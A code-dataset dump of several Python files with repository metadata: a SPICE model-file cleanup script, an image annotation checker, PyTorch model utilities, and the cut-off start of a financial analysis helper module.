# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = '0.39 + pnf_ne_1p2_mis' eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# while True:
# if '_mis' in line:
# startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
# startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
# startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
# remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# # remain 是这样的 "= '0.35 + deta0_ne_1p2 "
# original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
# if '+' in remain:
# for_replacement = remain.strip() + "'"
# else:
# for_replacement = remain.strip().replace("'","")
# line = line.replace(original, for_replacement)
# else:
# break
# line
##################################################################################################################################
##################################################################################################################################
# In[9]:
def get_mis_cleaned_mdl(raw_mdl):
    """Return a copy of *raw_mdl* with every ``*_mis`` mismatch term removed,
    echoing each affected line before and after the cleanup."""
    print("开始去除MIS参数**********************************************************************************************")
    cleaned = []
    for raw_line in raw_mdl:
        if '_mis' not in raw_line:
            cleaned.append(raw_line)
            continue
        print(raw_line)
        stripped_line = clean_all_mis_in_one_line(raw_line)
        print(stripped_line)
        cleaned.append(stripped_line)
    print("去除MIS参数结束**********************************************************************************************")
    return cleaned
# In[10]:
# #########测试cf去除效果################################################################################################
# #######################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6"
# line = "+clc = 1E-7 cle = 0.6 cf = '0 + 4.5E-11*pre_layout_sw'"
# line = "+clc = 1E-7 cf = '0 + 4.5E-11*pre_layout_sw cle = 0.6 '"
# print(line)
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line[:startof_pre].rfind('=')
# startof_plus = line[:startof_pre].rfind('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line = line.replace(orginal, for_replacement)
# print(line)
# #######################################################################################################################
# In[11]:
def get_cf_cleaned_mdl(mis_cleaned_mdl):
    """Replace each ``cf = '0 + <value>*pre_layout_sw'`` expression with the
    bare ``cf =<value>`` form, echoing every replacement, and drop the trailing
    line (the ``.ends`` line) from the result."""
    print("开始去除CF参数**********************************************************************************************")
    marker = "pre_layout_sw"
    processed = []
    for line in mis_cleaned_mdl:
        if "cf" in line:
            print("替换前的行为:")
            print(line)
            marker_pos = line.rfind(marker)
            eq_pos = line[:marker_pos].rfind('=')     # '=' opening the cf expression
            plus_pos = line[:marker_pos].rfind('+')   # '+' preceding the numeric value
            bare_value = line[plus_pos:marker_pos].replace('+', "").replace('*', "").strip()
            for_replacement = "=" + bare_value        # e.g. '=4.5E-11'
            original = line[eq_pos:marker_pos + len("pre_layout_sw'")]
            print("我们要替换CF行的表达式是%s。" % for_replacement)
            print("原始未替换的CF对应的表达式是%s。" % original)
            line = line.replace(original, for_replacement)
            print("替换后的行为:")
            print(line)
        processed.append(line)
    print("去除CF参数结束**********************************************************************************************")
    return processed[:-1]
# In[12]:
############用于测试替换cf的代码################################################################################################
##################################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6 "
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line.find('=')
# startof_plus = line[startof_cf:startof_pre].find('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line.replace(orginal, for_replacement)
##################################################################################################################################
##################################################################################################################################
# In[13]:
def get_allparams_cleaned_mdl(mydata):
    """Collapse every quoted parameter expression in *mydata* down to its
    leading numeric literal, e.g. ``eta0 = '0.35 + deta0'`` -> ``eta0 = 0.35``.
    Matching lines are echoed before substitution."""
    # Captures the leading numeric literal inside a quoted expression and
    # discards the rest of the quoted text.
    numeric_head = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'")
    print("现在执行替换全部MDL参数的函数**************************************************************************************")
    print("所有的含义参数的行内容如下*****************************************************************************************")
    stripped = []
    for line in mydata:
        if numeric_head.search(line):
            print(line)
            line = numeric_head.sub(r'\1', line)
        stripped.append(line)
    print("********************************************************************************************************************")
    return stripped
def get_final_lib(final_lib_part, cf_cleaned_mdl):
    """Append the shared ``.lib core`` section (built from the cleaned model
    lines) after the per-corner sections and return the combined library."""
    core_section = [".lib core\n"]
    core_section.extend(cf_cleaned_mdl)
    core_section.append(".endl core\n")
    return final_lib_part + core_section
# In[15]:
###########处理LIB的部分#########################################################################
# Split the combined .lib: collect corner sections, keep only the target
# MOSTYPE's parameter lines, and wrap them with per-corner headers/footers.
corner_param_dict = get_dict_of_lib(LIB_FILENAME)
single_mostype_corner_param_dict = get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
final_lib_part = get_final_lib_part(MOSNAME, single_mostype_corner_param_dict)
###########处理MDL的部分####################################################################
# Extract the target subckt's model card and strip, in order: blank lines,
# mismatch (_mis) terms, cf/pre_layout_sw expressions, then every remaining
# quoted parameter expression.
raw_mdl = get_blank_striped_mdl(MDL_FILENAME,MOSNAME)
mis_cleaned_mdl = get_mis_cleaned_mdl(raw_mdl)
cf_cleaned_mdl = get_cf_cleaned_mdl(mis_cleaned_mdl)
allparams_cleaned_mdl = get_allparams_cleaned_mdl(cf_cleaned_mdl)
############################################################################################
# Write the split results: <MOSNAME>.lib_NEW (corner sections + core section)
# and <MOSNAME>.pm_NEW (fully cleaned model card).
final_lib = get_final_lib(final_lib_part, cf_cleaned_mdl)
libfilename = MOSNAME + '.lib_NEW'
pmfilename = MOSNAME + '.pm_NEW'
with open(libfilename, mode='w') as f:
    for line in final_lib:
        f.writelines(line)
with open(pmfilename, mode='w') as f:
    for line in allparams_cleaned_mdl:
        f.writelines(line)
# Keep the console window open until the user acknowledges.
input("输入任意键退出!")
| 2,809 | 0 | 92 |
411c7c1af94a017abfd0a0835864ea506e386df2 | 1,498 | py | Python | check.py | GetYourLocation/Tools | e2d80a088c8b4f43572caff834ee2541eae7a4d5 | [
"MIT"
] | null | null | null | check.py | GetYourLocation/Tools | e2d80a088c8b4f43572caff834ee2541eae7a4d5 | [
"MIT"
] | null | null | null | check.py | GetYourLocation/Tools | e2d80a088c8b4f43572caff834ee2541eae7a4d5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
import warnings
warnings.filterwarnings("ignore")
try:
dataset = sys.argv[1]
data_dir = os.path.join('data', dataset)
except Exception as e:
print("Usage: python3 %s <directory name>" % sys.argv[0])
sys.exit(0)
DATA_FILE_PATH = os.path.join(data_dir, 'data.csv')
IMG_DIR = os.path.join(data_dir, 'JPEGImages')
ax = plt.gca()
with open(DATA_FILE_PATH, 'r') as data_file:
lines = data_file.readlines()
headers = lines[0].strip().split(',')
for line in lines[1:]:
chunks = line.strip().split(',')
label_name = ''
bbox_str = ''
for i, chunk in enumerate(chunks):
if (i != 0 and chunk != '-'):
label_name = headers[i]
bbox_str = chunk
bbox_strs = chunk.split(' ')
x1 = float(bbox_strs[0])
y1 = float(bbox_strs[1])
width = float(bbox_strs[2]) - x1
height = float(bbox_strs[3]) - y1
break
img = plt.imread(os.path.join(IMG_DIR, chunks[0]))
print("[%s] [%d*%d] [%s] [%s]" % (chunks[0], img.shape[1], img.shape[0], label_name, bbox_str), end='')
sys.stdout.flush()
plt.imshow(img)
rect = Rectangle((x1, y1), width, height)
rect.set_edgecolor('yellow')
rect.set_facecolor('none')
ax.add_patch(rect)
plt.pause(0.001)
input("")
rect.remove()
| 28.807692 | 107 | 0.609479 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Interactive annotation checker (duplicate copy): draw each bounding box
from data.csv on its image and wait for Enter between images."""
from __future__ import print_function
import os
import sys
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
import warnings
warnings.filterwarnings("ignore")
try:
    # Dataset directory name is the single CLI argument -> data/<name>.
    dataset = sys.argv[1]
    data_dir = os.path.join('data', dataset)
except Exception as e:
    print("Usage: python3 %s <directory name>" % sys.argv[0])
    sys.exit(0)
DATA_FILE_PATH = os.path.join(data_dir, 'data.csv')  # annotation CSV
IMG_DIR = os.path.join(data_dir, 'JPEGImages')       # image folder
ax = plt.gca()
with open(DATA_FILE_PATH, 'r') as data_file:
    lines = data_file.readlines()
    # Row 0: label names; remaining rows: one image each.
    headers = lines[0].strip().split(',')
    for line in lines[1:]:
        chunks = line.strip().split(',')
        label_name = ''
        bbox_str = ''
        # First non-'-' column is the label; box stored as "x1 y1 x2 y2".
        for i, chunk in enumerate(chunks):
            if (i != 0 and chunk != '-'):
                label_name = headers[i]
                bbox_str = chunk
                bbox_strs = chunk.split(' ')
                x1 = float(bbox_strs[0])
                y1 = float(bbox_strs[1])
                width = float(bbox_strs[2]) - x1
                height = float(bbox_strs[3]) - y1
                break
        img = plt.imread(os.path.join(IMG_DIR, chunks[0]))
        print("[%s] [%d*%d] [%s] [%s]" % (chunks[0], img.shape[1], img.shape[0], label_name, bbox_str), end='')
        sys.stdout.flush()
        plt.imshow(img)
        # Show box, wait for Enter, remove it before the next image.
        rect = Rectangle((x1, y1), width, height)
        rect.set_edgecolor('yellow')
        rect.set_facecolor('none')
        ax.add_patch(rect)
        plt.pause(0.001)
        input("")
        rect.remove()
5d04d47de01e33c3e1869914561675312dd53ea4 | 6,405 | py | Python | lib/utils.py | pemami4911/symmetric-and-object-centric-world-models | 8a03b08fc840d47602afeffba1a106651becd826 | [
"MIT"
] | 2 | 2020-12-22T08:11:44.000Z | 2022-03-15T21:50:17.000Z | lib/utils.py | pemami4911/symmetric-and-object-centric-world-models | 8a03b08fc840d47602afeffba1a106651becd826 | [
"MIT"
] | null | null | null | lib/utils.py | pemami4911/symmetric-and-object-centric-world-models | 8a03b08fc840d47602afeffba1a106651becd826 | [
"MIT"
] | 1 | 2022-03-15T21:50:18.000Z | 2022-03-15T21:50:18.000Z | import torch
import torch.nn.functional as F
from torch.nn import init
import numpy as np
from scipy.stats import truncnorm
def init_weights(net, init_type='normal', init_gain=0.02):
    """Initialize network weights.
    Modified from: https://github.com/baudm/MONet-pytorch/blob/master/models/networks.py
    Parameters:
        net (network)     -- network to be initialized
        init_type (str)   -- the name of an initialization method: normal | xavier | kaiming | orthogonal | truncated_normal
        init_gain (float) -- scaling factor for normal, xavier and orthogonal.
    We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
    work better for some applications. Feel free to try yourself.
    """
    # BUG FIX: this copy referenced `init_func` without defining it, raising
    # NameError on every call; the nested initializer is restored here.
    def init_func(m):  # applied to every submodule by net.apply below
        classname = m.__class__.__name__
        # Conv*/Linear layers get the chosen scheme; their biases are zeroed.
        if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
            if init_type == 'normal':
                init.normal_(m.weight.data, 0.0, init_gain)
            elif init_type == 'xavier':
                init.xavier_normal_(m.weight.data, gain=init_gain)
            elif init_type == 'kaiming':
                init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
            elif init_type == 'orthogonal':
                init.orthogonal_(m.weight.data, gain=init_gain)
            elif init_type == 'truncated_normal':
                # Standard normal truncated to +/- 2*init_gain (bounds only;
                # loc/scale stay at the scipy defaults, as in the original).
                values = truncnorm.rvs(-2 * init_gain, 2 * init_gain, size=tuple(m.weight.shape))
                m.weight.data = m.weight.data.new_tensor(values)
            else:
                raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
            if hasattr(m, 'bias') and m.bias is not None:
                init.constant_(m.bias.data, 0.0)
        elif classname.find('BatchNorm2d') != -1:
            # BatchNorm: weight ~ N(1, init_gain), bias = 0.
            init.normal_(m.weight.data, 1.0, init_gain)
            init.constant_(m.bias.data, 0.0)
    net.apply(init_func)
def gmm_loglikelihood(x_t, x_loc, log_var, mask_logprobs):
    """Negative log-likelihood of x_t under a K-slot pixelwise Gaussian
    mixture (constant normalization term omitted).

    x_t: [N, C, H, W] target image; x_loc: [N, K, C, H, W] component means;
    log_var: log-variance (broadcastable against x_loc);
    mask_logprobs: [N, K, 1, H, W] log mixture weights.
    Returns (nll [N], dict of intermediate per-component terms).
    """
    # Squared error of each component mean vs. the target: [N, K, C, H, W]
    sq_err = (x_t.unsqueeze(1) - x_loc).pow(2)
    # log N(x; x_loc, log_var): [N, K, C, H, W]
    normal_ll = -0.5 * log_var - 0.5 * (sq_err / torch.exp(log_var))
    # [N, K, C, H, W]: weight each component's log density by its mask weight
    log_p_k = (mask_logprobs + normal_ll)
    # logsumexp over slots [N, C, H, W]: mixture log-density per pixel
    log_p = torch.logsumexp(log_p_k, dim=1)
    # [batch_size]: sum over channels/pixels, negate
    nll = -torch.sum(log_p, dim=[1,2,3])
    #upper_bound = torch.logsumexp(mask_logprobs - 0.5 * (sq_err / torch.exp(log_var)), dim=1) # [N, C, H, W]
    #upper_bound = torch.sum(upper_bound, dim=[1,2,3]) # [N]
    return nll, {'log_p_k': log_p_k, 'normal_ll': normal_ll, 'ub': None}
def get_log_var_grad(val_dataloader, model, geco, seq_len, aggregate_over=20):
    """Estimate gradient noise of the relational-dynamics parameters.

    Runs backward passes over `val_dataloader` (assumes batch_size == 1 and a
    CUDA, DataParallel-style model exposing `model.module`), collects each
    parameter's flattened gradient in groups of `aggregate_over` batches, and
    records the mean log-variance of the gradient entries per group. Returns
    those log-variances averaged first per parameter, then across parameters.

    NOTE(review): the SGD optimizer is only used for zero_grad(); step() is
    never called, so model weights are not updated.
    """
    opt = torch.optim.SGD(model.parameters(), lr=1)
    model.train()
    # Count trainable parameter tensors of the dynamics submodule.
    num_grads = 0
    for p in model.module.relational_dynamics.parameters():
        if p.requires_grad:
            num_grads += 1
    grads = [[] for i in range(num_grads)]        # per-parameter flattened grads
    logvargrads = [[] for i in range(num_grads)]  # per-parameter mean log-variances
    for i,batch in enumerate(val_dataloader):
        imgs = batch['imgs'].to('cuda')
        imgs = imgs[:,:seq_len]  # truncate each sequence to seq_len frames
        model_outs = model(imgs, geco, i, None)
        opt.zero_grad()
        total_loss = model_outs['total_loss'] # [1] for sample size 1
        total_loss.backward()
        torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.)
        # for each parameter, flatten and store
        j = 0
        for p in model.module.relational_dynamics.parameters():
            if p.requires_grad:
                grads[j] += [p.grad.view(-1)]
                j += 1
        if len(grads[0]) == aggregate_over:
            print('aggregating at {}'.format(i))
            for j,g in enumerate(grads):
                all_grad = torch.stack(g).data.cpu().numpy() # [aggregate, dim]
                # Mean log-variance over entries; 1e-6 guards against log(0).
                logvargrads[j] += [np.mean(np.log(np.var(all_grad, 1)+1e-6))]
            # reset
            grads = [[] for i in range(num_grads)]
    # Average within each parameter, then across parameters.
    lvg_ = 0
    for lvg in logvargrads:
        lvg_ += np.mean(lvg)
    lvg_ = lvg_ / len(logvargrads)
    return lvg_
| 37.676471 | 144 | 0.609836 | import torch
import torch.nn.functional as F
from torch.nn import init
import numpy as np
from scipy.stats import truncnorm
def truncated_normal_initializer(shape, mean, stddev):
    """Sample a float32 tensor of `shape` from a standard normal truncated to
    [mean - 2*stddev, mean + 2*stddev] (bounds only; scipy's default
    loc=0/scale=1 are kept, matching the original)."""
    lower = mean - 2 * stddev
    upper = mean + 2 * stddev
    samples = truncnorm.rvs(lower, upper, size=shape)
    return torch.from_numpy(samples).float()
def init_weights(net, init_type='normal', init_gain=0.02):
    """Initialize network weights.
    Modified from: https://github.com/baudm/MONet-pytorch/blob/master/models/networks.py
    Parameters:
        net (network)     -- network to be initialized
        init_type (str)   -- the name of an initialization method: normal | xavier | kaiming | orthogonal | truncated_normal
        init_gain (float) -- scaling factor for normal, xavier, orthogonal and truncated_normal.
    We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
    work better for some applications. Feel free to try yourself.
    """
    def init_func(m): # define the initialization function
        classname = m.__class__.__name__
        # Conv*/Linear layers get the selected scheme; their biases are zeroed.
        if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
            if init_type == 'normal':
                init.normal_(m.weight.data, 0.0, init_gain)
            elif init_type == 'xavier':
                init.xavier_normal_(m.weight.data, gain=init_gain)
            elif init_type == 'kaiming':
                init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
            elif init_type == 'orthogonal':
                init.orthogonal_(m.weight.data, gain=init_gain)
            elif init_type == 'truncated_normal':
                # Resamples the whole weight tensor (replaces, not in-place).
                m.weight.data = truncated_normal_initializer(m.weight.shape, 0.0, stddev=init_gain)
            else:
                raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
            if hasattr(m, 'bias') and m.bias is not None:
                init.constant_(m.bias.data, 0.0)
        elif classname.find('BatchNorm2d') != -1:
            # BatchNorm: weight ~ N(1, init_gain), bias = 0.
            init.normal_(m.weight.data, 1.0, init_gain)
            init.constant_(m.bias.data, 0.0)
    net.apply(init_func)
def _softplus_to_std(softplus):
softplus = torch.min(softplus, torch.ones_like(softplus)*80)
return torch.sqrt(torch.log(1. + softplus.exp()) + 1e-5)
def mvn(loc, softplus, temperature=1.0):
    """Diagonal Gaussian with mean `loc`; std derived from `softplus` via
    _softplus_to_std and sharpened by 1/temperature. The last dimension is
    treated as the event dimension."""
    scale = _softplus_to_std(softplus) * (1. / temperature)
    base = torch.distributions.normal.Normal(loc, scale)
    return torch.distributions.independent.Independent(base, 1)
def std_mvn(shape, device):
    """Standard (zero-mean, unit-std) diagonal Gaussian of `shape` on
    `device`; the last dimension is the event dimension."""
    mean = torch.zeros(shape).to(device)
    std = torch.ones(shape).to(device)
    normal = torch.distributions.normal.Normal(mean, std)
    return torch.distributions.independent.Independent(normal, 1)
def gmm_loglikelihood(x_t, x_loc, log_var, mask_logprobs):
    """Negative log-likelihood of x_t under a K-slot pixelwise Gaussian
    mixture (normalization constant omitted).

    x_t: [N, C, H, W] target; x_loc: [N, K, C, H, W] component means;
    log_var: log-variance (broadcastable); mask_logprobs: [N, K, 1, H, W]
    log mixture weights. Returns (nll [N], dict of intermediate terms).
    """
    # Per-component squared error against the target: [N, K, C, H, W]
    squared_error = (x_t.unsqueeze(1) - x_loc) ** 2
    # Gaussian log density of each component (constant term dropped).
    component_ll = -0.5 * log_var - 0.5 * (squared_error / log_var.exp())
    # Combine with the log mixture weights: [N, K, C, H, W]
    weighted_ll = mask_logprobs + component_ll
    # Mixture log-density per pixel: logsumexp over the K slots -> [N, C, H, W]
    mixture_ll = torch.logsumexp(weighted_ll, dim=1)
    # One NLL value per batch element.
    nll = -mixture_ll.sum(dim=[1, 2, 3])
    return nll, {'log_p_k': weighted_ll, 'normal_ll': component_ll, 'ub': None}
def gaussian_loglikelihood(x_t, x_loc, log_var):
    """Pixelwise Gaussian NLL of x_t given mean x_loc and log-variance
    log_var (normalization constant omitted). Returns one value per batch
    element: [N]."""
    squared_error = (x_t - x_loc) ** 2  # [N, C, H, W]
    log_density = -0.5 * log_var - 0.5 * (squared_error / log_var.exp())
    return -log_density.sum(dim=[1, 2, 3])
def create_video(means, masks, sum_over_k=True):
    """Compose per-timestep frames from slot means and masks.

    `means`/`masks` are length-T lists of tensors; the slot axis is 2 when a
    rollout axis is present (6-D tensors), else 1. With sum_over_k the slots
    are alpha-blended by summing mean*mask over the slot axis; otherwise each
    masked slot is kept separately on a white background. Returns the frames
    stacked along a new leading time axis.
    """
    slot_axis = 2 if len(means[0].shape) == 6 else 1
    frames = []
    for step in range(len(means)):
        mean_t = means[step]
        mask_t = masks[step]
        if sum_over_k:
            # [batch_size, rollouts, C, H, W] after summing out the slot axis
            frame = torch.sum(mean_t.detach() * mask_t.detach(), slot_axis)
        else:
            # Keep slots separate; unmasked area is filled with white (ones).
            white = torch.ones(mean_t.shape).to(mean_t.device)
            frame = (mean_t * mask_t) + (1 - mask_t) * white
        frames.append(frame)
    # [seq_len, batch_size, rollouts, [K], C, H, W]
    return torch.stack(frames)
def rename_state_dict(state_dict, old_strings, new_strings):
    """Return a copy of `state_dict` where every key containing one of
    `old_strings` is re-inserted under the key with that substring replaced
    by the paired entry of `new_strings`. Keys matching none of the old
    substrings are carried over unchanged; matching keys are NOT kept under
    their original name."""
    renamed = {}
    # First pass: add the renamed entries for every (old, new) pair.
    for old, new in zip(old_strings, new_strings):
        for key, value in state_dict.items():
            if old in key:
                renamed[key.replace(old, new)] = value
    # Second pass: copy through keys untouched by every old substring.
    for key, value in state_dict.items():
        if not any(old in key for old in old_strings):
            renamed[key] = value
    return renamed
def get_log_var_grad(val_dataloader, model, geco, seq_len, aggregate_over=20):
    """Estimate gradient noise of the relational-dynamics parameters.

    Runs backward passes over `val_dataloader` (assumes batch_size == 1 and a
    CUDA, DataParallel-style model exposing `model.module`), collects each
    parameter's flattened gradient in groups of `aggregate_over` batches, and
    records the mean log-variance of the gradient entries per group. Returns
    those log-variances averaged first per parameter, then across parameters.

    NOTE(review): the SGD optimizer is only used for zero_grad(); step() is
    never called, so model weights are not updated.
    """
    opt = torch.optim.SGD(model.parameters(), lr=1)
    model.train()
    # Count trainable parameter tensors of the dynamics submodule.
    num_grads = 0
    for p in model.module.relational_dynamics.parameters():
        if p.requires_grad:
            num_grads += 1
    grads = [[] for i in range(num_grads)]        # per-parameter flattened grads
    logvargrads = [[] for i in range(num_grads)]  # per-parameter mean log-variances
    for i,batch in enumerate(val_dataloader):
        imgs = batch['imgs'].to('cuda')
        imgs = imgs[:,:seq_len]  # truncate each sequence to seq_len frames
        model_outs = model(imgs, geco, i, None)
        opt.zero_grad()
        total_loss = model_outs['total_loss'] # [1] for sample size 1
        total_loss.backward()
        torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.)
        # for each parameter, flatten and store
        j = 0
        for p in model.module.relational_dynamics.parameters():
            if p.requires_grad:
                grads[j] += [p.grad.view(-1)]
                j += 1
        if len(grads[0]) == aggregate_over:
            print('aggregating at {}'.format(i))
            for j,g in enumerate(grads):
                all_grad = torch.stack(g).data.cpu().numpy() # [aggregate, dim]
                # Mean log-variance over entries; 1e-6 guards against log(0).
                logvargrads[j] += [np.mean(np.log(np.var(all_grad, 1)+1e-6))]
            # reset
            grads = [[] for i in range(num_grads)]
    # Average within each parameter, then across parameters.
    lvg_ = 0
    for lvg in logvargrads:
        lvg_ += np.mean(lvg)
    lvg_ = lvg_ / len(logvargrads)
    return lvg_
| 3,183 | 0 | 187 |
18bbea310b3c36c11d394d4aa36ce9287ac2de2a | 49,201 | py | Python | data_science_utils/financial/__init__.py | krishnagorrepati/Data_science_utils | 15072ae11935800a5d0914b3ff0ccea11ffe4b73 | [
"MIT"
] | 70 | 2018-05-02T08:35:16.000Z | 2022-03-21T16:46:12.000Z | data_science_utils/financial/__init__.py | krishnagorrepati/Data_science_utils | 15072ae11935800a5d0914b3ff0ccea11ffe4b73 | [
"MIT"
] | 2 | 2019-06-28T00:19:04.000Z | 2020-07-28T14:04:09.000Z | data_science_utils/financial/__init__.py | krishnagorrepati/Data_science_utils | 15072ae11935800a5d0914b3ff0ccea11ffe4b73 | [
"MIT"
] | 75 | 2018-09-19T18:53:21.000Z | 2022-03-26T17:30:19.000Z | import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from stockstats import StockDataFrame
import warnings
import traceback
warnings.filterwarnings('ignore')
import argparse
import re
import sys, os
sys.path.append(os.getcwd())
import os
import requests
from requests.exceptions import ConnectionError
import bs4
from bs4 import BeautifulSoup
from fastnumbers import isfloat
from fastnumbers import fast_float
from multiprocessing.dummy import Pool as ThreadPool
import more_itertools
from random import shuffle
import matplotlib.pyplot as plt
import seaborn as sns
from datetime import datetime
import json
import seaborn as sns
sns.set_style('whitegrid')
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib as mplt
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import explained_variance_score
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
import matplotlib.dates as mdates
import seaborn as sns
import math
import gc
import ipaddress
from urllib.parse import urlparse
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from data_science_utils import dataframe as df_utils
from data_science_utils import models as model_utils
from data_science_utils.dataframe import column as column_utils
from data_science_utils.models.IdentityScaler import IdentityScaler as IdentityScaler
from xgboost import XGBClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix,classification_report
import lightgbm as lgb
np.set_printoptions(threshold=np.nan)
import pickle
from xgboost import XGBClassifier
import xgboost as xgb
from sklearn.metrics import accuracy_score
import missingno as msno
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn.decomposition import PCA
import datetime
from scipy import signal
import matplotlib.pyplot as plt
from datetime import timedelta
from sklearn import linear_model
from sklearn.metrics import roc_auc_score
from IPython.display import display, HTML
import warnings
warnings.filterwarnings('ignore')
from data_science_utils.misc import ffloat
from data_science_utils.misc import is_dataframe
from data_science_utils.misc import ffloat_list
from data_science_utils.misc import remove_multiple_spaces
from datetime import date, timedelta
| 41.310663 | 202 | 0.647527 | import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from stockstats import StockDataFrame
import warnings
import traceback
warnings.filterwarnings('ignore')
import argparse
import re
import sys, os
sys.path.append(os.getcwd())
import os
import requests
from requests.exceptions import ConnectionError
import bs4
from bs4 import BeautifulSoup
from fastnumbers import isfloat
from fastnumbers import fast_float
from multiprocessing.dummy import Pool as ThreadPool
import more_itertools
from random import shuffle
import matplotlib.pyplot as plt
import seaborn as sns
from datetime import datetime
import json
import seaborn as sns
sns.set_style('whitegrid')
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib as mplt
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import explained_variance_score
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
import matplotlib.dates as mdates
import seaborn as sns
import math
import gc
import ipaddress
from urllib.parse import urlparse
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from data_science_utils import dataframe as df_utils
from data_science_utils import models as model_utils
from data_science_utils.dataframe import column as column_utils
from data_science_utils.models.IdentityScaler import IdentityScaler as IdentityScaler
from xgboost import XGBClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix,classification_report
import lightgbm as lgb
np.set_printoptions(threshold=np.nan)
import pickle
from xgboost import XGBClassifier
import xgboost as xgb
from sklearn.metrics import accuracy_score
import missingno as msno
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn.decomposition import PCA
import datetime
from scipy import signal
import matplotlib.pyplot as plt
from datetime import timedelta
from sklearn import linear_model
from sklearn.metrics import roc_auc_score
from IPython.display import display, HTML
import warnings
warnings.filterwarnings('ignore')
from data_science_utils.misc import ffloat
from data_science_utils.misc import is_dataframe
from data_science_utils.misc import ffloat_list
from data_science_utils.misc import remove_multiple_spaces
from datetime import date, timedelta
def prev_weekday(adate):
    """Return `adate` itself if it falls on Mon-Fri; otherwise roll weekend
    dates back to the preceding Friday."""
    # weekday(): Mon=0 .. Fri=4, Sat=5, Sun=6 — loop never runs for weekdays.
    while adate.weekday() > 4:
        adate -= timedelta(days=1)
    return adate
def get_ci(p, t, r):
    """Compound principal `p` for `t` periods at `r` percent per period and
    return the resulting (positive) future value.

    Replaces the deprecated ``np.fv`` (removed in NumPy 1.20; now in the
    separate ``numpy_financial`` package). With zero periodic payment,
    ``abs(fv(rate, t, 0, p)) == p * (1 + rate) ** t``.
    """
    return np.abs(p * (1.0 + r / 100.0) ** t)
def get_cumulative_amounts(p, t, r):
    """Principal plus its compounded value after each of the first t-1
    periods at r percent: p + sum_{i=1}^{t-1} get_ci(p, i, r)."""
    return p + sum(get_ci(p, i, r) for i in range(1, t))
def get_year_when_cumulative_profit_over_pe(pe, cpg):
    """First year in which cumulative profit (growing at `cpg` percent)
    reaches the `pe` multiple paid per unit of earnings; inf if either input
    is NaN. The search is capped at ceil(pe) years, which is returned when no
    earlier year qualifies."""
    if np.isnan(pe) or np.isnan(cpg):
        return np.inf
    horizon = int(np.ceil(pe))
    for year in range(1, horizon):
        if get_cumulative_amounts(1, year, cpg) >= pe:
            return year
    return horizon
def get_children(html_content):
